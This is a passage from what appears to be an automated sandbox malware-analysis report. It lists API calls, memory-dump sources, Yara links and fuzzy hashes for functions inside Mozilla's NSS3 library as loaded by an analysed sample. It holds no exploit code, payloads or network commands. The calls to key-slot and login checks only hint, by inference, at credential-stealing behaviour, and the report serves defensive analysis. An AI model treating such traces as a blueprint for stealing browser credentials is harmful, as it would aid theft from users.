                                                                                                                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(?,00000018,?,6C75CD93,?), ref: 6C75CEFC
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7510C0: TlsGetValue.KERNEL32(?,6C6F8802,00000000,00000008,?,6C6EEF74,00000000), ref: 6C7510F3
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7510C0: EnterCriticalSection.KERNEL32(?,?,6C6F8802,00000000,00000008,?,6C6EEF74,00000000), ref: 6C75110C
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7510C0: PL_ArenaAllocate.NSS3(?,?,?,6C6F8802,00000000,00000008,?,6C6EEF74,00000000), ref: 6C751141
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7510C0: PR_Unlock.NSS3(?,?,?,6C6F8802,00000000,00000008,?,6C6EEF74,00000000), ref: 6C751182
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7510C0: TlsGetValue.KERNEL32(?,6C6F8802,00000000,00000008,?,6C6EEF74,00000000), ref: 6C75119C
                                                                                                                                                                                                                                                                                          • SECOID_FindOIDByTag_Util.NSS3(00000023,?,?,?,6C75CD93,?), ref: 6C75CF0B
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C750840: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C7508B4
                                                                                                                                                                                                                                                                                          • SECITEM_CopyItem_Util.NSS3(?,00000000,00000000,?,?,?,?,6C75CD93,?), ref: 6C75CF1D
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C74FB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6C748D2D,?,00000000,?), ref: 6C74FB85
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C74FB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6C74FBB1
                                                                                                                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(?,00000008,?,?,?,?,?,?,?,6C75CD93,?), ref: 6C75CF47
                                                                                                                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(?,0000000C,?,?,?,?,?,?,?,?,?,6C75CD93,?), ref: 6C75CF67
                                                                                                                                                                                                                                                                                          • SECITEM_CopyItem_Util.NSS3(?,00000000,6C75CD93,?,?,?,?,?,?,?,?,?,?,?,6C75CD93,?), ref: 6C75CF78
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Util$Arena$Alloc_$Value$CopyCriticalEnterItem_SectionUnlock$AllocateErrorFindMark_Tag_memcpy
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 4291907967-0
                                                                                                                                                                                                                                                                                          • Opcode ID: a3aab832d6a22432be4a6ae88c8f79b101dc4fa96841c8453af480ac5133103c
                                                                                                                                                                                                                                                                                          • Instruction ID: a0883cf2585bcfea4b5e89b1376aecc155463688102207e8cb8c12e4f8fc99e4
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a3aab832d6a22432be4a6ae88c8f79b101dc4fa96841c8453af480ac5133103c
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D211A5A6E002045BF700AE666E49B6BB5EC9F5854EF444039EC09D7781FF62D928C6F1
                                                                                                                                                                                                                                                                                          Function 6C708C00 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75memoryCOMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • TlsGetValue.KERNEL32 ref: 6C708C1B
                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32 ref: 6C708C34
                                                                                                                                                                                                                                                                                          • PL_ArenaAllocate.NSS3 ref: 6C708C65
                                                                                                                                                                                                                                                                                          • PR_Unlock.NSS3 ref: 6C708C9C
                                                                                                                                                                                                                                                                                          • PR_Unlock.NSS3 ref: 6C708CB6
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C79DD70: TlsGetValue.KERNEL32 ref: 6C79DD8C
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C79DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C79DDB4
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: CriticalSectionUnlockValue$AllocateArenaEnterLeave
                                                                                                                                                                                                                                                                                          • String ID: KRAM
                                                                                                                                                                                                                                                                                          • API String ID: 4127063985-3815160215
                                                                                                                                                                                                                                                                                          • Opcode ID: 78310f22fadbcfdbb1a68f8f7db75b9d80e7af433c9a00543b691531adb6c802
                                                                                                                                                                                                                                                                                          • Instruction ID: 72d6d56221e24e2338e49f03292529fe1d52ea2ff609916506ab24a3ad472189
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 78310f22fadbcfdbb1a68f8f7db75b9d80e7af433c9a00543b691531adb6c802
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F6215CF1A056018FD700AF78C58855ABBF4FF05308F0589AAD8888B712EB35D889CBD2
                                                                                                                                                                                                                                                                                          Function 6C718E80 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 71COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • PK11_GetInternalKeySlot.NSS3(?,?,?,6C732E62,?,?,?,?,?,?,?,00000000,?,?,?,6C704F1C), ref: 6C718EA2
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C73F820: free.MOZGLUE(6A1B7500,2404110F,?,?), ref: 6C73F854
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C73F820: free.MOZGLUE(FFD3F9E8,2404110F,?,?), ref: 6C73F868
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C73F820: DeleteCriticalSection.KERNEL32(04C4841B,2404110F,?,?), ref: 6C73F882
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C73F820: free.MOZGLUE(04C483FF,?,?), ref: 6C73F889
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C73F820: DeleteCriticalSection.KERNEL32(CCCCCCDF,2404110F,?,?), ref: 6C73F8A4
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C73F820: free.MOZGLUE(CCCCCCC3,?,?), ref: 6C73F8AB
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C73F820: DeleteCriticalSection.KERNEL32(280F1108,2404110F,?,?), ref: 6C73F8C9
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C73F820: free.MOZGLUE(280F10EC,?,?), ref: 6C73F8D0
                                                                                                                                                                                                                                                                                          • PK11_IsLoggedIn.NSS3(?,?,?,6C732E62,?,?,?,?,?,?,?,00000000,?,?,?,6C704F1C), ref: 6C718EC3
                                                                                                                                                                                                                                                                                          • TlsGetValue.KERNEL32(?,?,?,6C732E62,?,?,?,?,?,?,?,00000000,?,?,?,6C704F1C), ref: 6C718EDC
                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,?,?,?,6C732E62,?,?,?,?,?,?,?,00000000,?,?), ref: 6C718EF1
                                                                                                                                                                                                                                                                                          • PR_Unlock.NSS3 ref: 6C718F20
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: free$CriticalSection$Delete$K11_$EnterInternalLoggedSlotUnlockValue
                                                                                                                                                                                                                                                                                          • String ID: b.sl
                                                                                                                                                                                                                                                                                          • API String ID: 1978757487-3266219064
                                                                                                                                                                                                                                                                                          • Opcode ID: 2532746478f039c67582224f7ec930edbeac8b3e30ea3452439ad8286168f4de
                                                                                                                                                                                                                                                                                          • Instruction ID: f9e700a921b87c8530d78760065b718a98d6acc126e1065f286fd2e475ea8602
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2532746478f039c67582224f7ec930edbeac8b3e30ea3452439ad8286168f4de
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 61217F709097059FDB00AF29D688599BBF8FF48318F4A456EEC989BB41D730E854CBD2
                                                                                                                                                                                                                                                                                          Function 6C783E20 Relevance: 10.6, APIs: 7, Instructions: 70COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C785B40: PR_GetIdentitiesLayer.NSS3 ref: 6C785B56
                                                                                                                                                                                                                                                                                          • PR_EnterMonitor.NSS3(?), ref: 6C783E45
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7B9090: TlsGetValue.KERNEL32 ref: 6C7B90AB
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7B9090: TlsGetValue.KERNEL32 ref: 6C7B90C9
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7B9090: EnterCriticalSection.KERNEL32 ref: 6C7B90E5
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7B9090: TlsGetValue.KERNEL32 ref: 6C7B9116
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7B9090: LeaveCriticalSection.KERNEL32 ref: 6C7B913F
                                                                                                                                                                                                                                                                                          • PR_EnterMonitor.NSS3(?), ref: 6C783E5C
                                                                                                                                                                                                                                                                                          • PR_EnterMonitor.NSS3(?), ref: 6C783E73
                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE8D5,00000000), ref: 6C783EA6
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C79C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C79C2BF
                                                                                                                                                                                                                                                                                          • PR_ExitMonitor.NSS3(?), ref: 6C783EC0
                                                                                                                                                                                                                                                                                          • PR_ExitMonitor.NSS3(?), ref: 6C783ED7
                                                                                                                                                                                                                                                                                          • PR_ExitMonitor.NSS3(?), ref: 6C783EEE
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Monitor$EnterValue$Exit$CriticalSection$ErrorIdentitiesLayerLeave
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 2517541793-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 54027f88e9f8c7aef8774f630c25a29e5d64c5ae93700a839b1c12e084a23d9d
                                                                                                                                                                                                                                                                                          • Instruction ID: 7d55b90461d66c2a58c9e2be04eb9e5c64ffece0550a449705f48e374679653f
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 54027f88e9f8c7aef8774f630c25a29e5d64c5ae93700a839b1c12e084a23d9d
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1611EB71552500ABDB315E2DFE0ABC7B7B5DB61318F400834E71996A22E636E429C752
                                                                                                                                                                                                                                                                                          Function 6C802C80 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61stringCOMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • PR_EnterMonitor.NSS3 ref: 6C802CA0
                                                                                                                                                                                                                                                                                          • PR_ExitMonitor.NSS3 ref: 6C802CBE
                                                                                                                                                                                                                                                                                          • calloc.MOZGLUE(00000001,00000014), ref: 6C802CD1
                                                                                                                                                                                                                                                                                          • strdup.MOZGLUE(?), ref: 6C802CE1
                                                                                                                                                                                                                                                                                          • PR_LogPrint.NSS3(Loaded library %s (static lib),00000000), ref: 6C802D27
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          • Loaded library %s (static lib), xrefs: 6C802D22
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Monitor$EnterExitPrintcallocstrdup
                                                                                                                                                                                                                                                                                          • String ID: Loaded library %s (static lib)
                                                                                                                                                                                                                                                                                          • API String ID: 3511436785-2186981405
                                                                                                                                                                                                                                                                                          • Opcode ID: eaa045963d7ccf690357e82499dfe524a828b6cbff66bf2c6fbd7f234abdf90d
                                                                                                                                                                                                                                                                                          • Instruction ID: b7395839b78dfa9587c33c7277c16ab4bb88f271ae2824e7871ba62fd379f263
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: eaa045963d7ccf690357e82499dfe524a828b6cbff66bf2c6fbd7f234abdf90d
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0B11D3B17012049BEB309F19DD4866677B8AB4631EF95883DD80987B41DBB9DC08CBE1
                                                                                                                                                                                                                                                                                          Function 6C6FBDC0 Relevance: 10.6, APIs: 7, Instructions: 54memoryCOMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • PORT_NewArena_Util.NSS3(00000800), ref: 6C6FBDCA
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C750FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C6F87ED,00000800,6C6EEF74,00000000), ref: 6C751000
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C750FF0: PR_NewLock.NSS3(?,00000800,6C6EEF74,00000000), ref: 6C751016
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C750FF0: PL_InitArenaPool.NSS3(00000000,security,6C6F87ED,00000008,?,00000800,6C6EEF74,00000000), ref: 6C75102B
                                                                                                                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(00000000,0000000C), ref: 6C6FBDDB
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7510C0: TlsGetValue.KERNEL32(?,6C6F8802,00000000,00000008,?,6C6EEF74,00000000), ref: 6C7510F3
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7510C0: EnterCriticalSection.KERNEL32(?,?,6C6F8802,00000000,00000008,?,6C6EEF74,00000000), ref: 6C75110C
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7510C0: PL_ArenaAllocate.NSS3(?,?,?,6C6F8802,00000000,00000008,?,6C6EEF74,00000000), ref: 6C751141
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7510C0: PR_Unlock.NSS3(?,?,?,6C6F8802,00000000,00000008,?,6C6EEF74,00000000), ref: 6C751182
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7510C0: TlsGetValue.KERNEL32(?,6C6F8802,00000000,00000008,?,6C6EEF74,00000000), ref: 6C75119C
                                                                                                                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(00000000,0000000C), ref: 6C6FBDEC
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7510C0: PL_ArenaAllocate.NSS3(?,6C6F8802,00000000,00000008,?,6C6EEF74,00000000), ref: 6C75116E
                                                                                                                                                                                                                                                                                          • SECITEM_CopyItem_Util.NSS3(00000000,00000000,?), ref: 6C6FBE03
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C74FB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6C748D2D,?,00000000,?), ref: 6C74FB85
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C74FB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6C74FBB1
                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE013,00000000), ref: 6C6FBE22
                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE013,00000000), ref: 6C6FBE30
                                                                                                                                                                                                                                                                                          • PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C6FBE3B
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: ArenaUtil$Alloc_$AllocateArena_ErrorValue$CopyCriticalEnterFreeInitItem_LockPoolSectionUnlockcallocmemcpy
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 1821307800-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 49bd7be85a6d6651bfacdc823afd404720f93631e91d5564c55d0a1637df6a24
                                                                                                                                                                                                                                                                                          • Instruction ID: e85ce123e2dd78b925415ee0db612cec83f67706db2ae28381c5d21fa9cbe7fc
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 49bd7be85a6d6651bfacdc823afd404720f93631e91d5564c55d0a1637df6a24
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5D014E69A4020177F6101666BD0DF9776494F913CEF540030FE1896BC2FF51D12B83BA
                                                                                                                                                                                                                                                                                          Function 6C750FF0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 54COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C6F87ED,00000800,6C6EEF74,00000000), ref: 6C751000
                                                                                                                                                                                                                                                                                          • PR_NewLock.NSS3(?,00000800,6C6EEF74,00000000), ref: 6C751016
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7B98D0: calloc.MOZGLUE(00000001,00000084,6C6E0936,00000001,?,6C6E102C), ref: 6C7B98E5
                                                                                                                                                                                                                                                                                          • PL_InitArenaPool.NSS3(00000000,security,6C6F87ED,00000008,?,00000800,6C6EEF74,00000000), ref: 6C75102B
                                                                                                                                                                                                                                                                                          • TlsGetValue.KERNEL32(00000000,?,?,6C6F87ED,00000800,6C6EEF74,00000000), ref: 6C751044
                                                                                                                                                                                                                                                                                          • free.MOZGLUE(00000000,?,00000800,6C6EEF74,00000000), ref: 6C751064
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: calloc$ArenaInitLockPoolValuefree
                                                                                                                                                                                                                                                                                          • String ID: security
                                                                                                                                                                                                                                                                                          • API String ID: 3379159031-3315324353
                                                                                                                                                                                                                                                                                          • Opcode ID: 4ea60403e36fd17aa15a32144148fd5b83e64d1a14649b634bf7d00d40693f37
                                                                                                                                                                                                                                                                                          • Instruction ID: d555f961b23c15331655e48550b491419c563ce9aef8da9e3335eaef73c38a01
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4ea60403e36fd17aa15a32144148fd5b83e64d1a14649b634bf7d00d40693f37
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F2014870A0025057E7302F2D9E08A563A78BF1774EF814536E80C96A52EF70C168EBD1
                                                                                                                                                                                                                                                                                          Function 6C781C60 Relevance: 10.5, APIs: 7, Instructions: 49COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE001,00000000), ref: 6C781C74
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C79C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C79C2BF
                                                                                                                                                                                                                                                                                          • DeleteCriticalSection.KERNEL32(?), ref: 6C781C92
                                                                                                                                                                                                                                                                                          • free.MOZGLUE(?), ref: 6C781C99
                                                                                                                                                                                                                                                                                          • DeleteCriticalSection.KERNEL32(?), ref: 6C781CCB
                                                                                                                                                                                                                                                                                          • free.MOZGLUE(?), ref: 6C781CD2
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: CriticalDeleteSectionfree$ErrorValue
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 3805613680-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 49640d11d82a6fb51e0fbd0341188a417470ca5fb36cbcae375163d55c8c15a1
                                                                                                                                                                                                                                                                                          • Instruction ID: 51bf5d04cf9cae2b997fa886eb1336c73563c0d9589bcf250f6a914eb951a032
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 49640d11d82a6fb51e0fbd0341188a417470ca5fb36cbcae375163d55c8c15a1
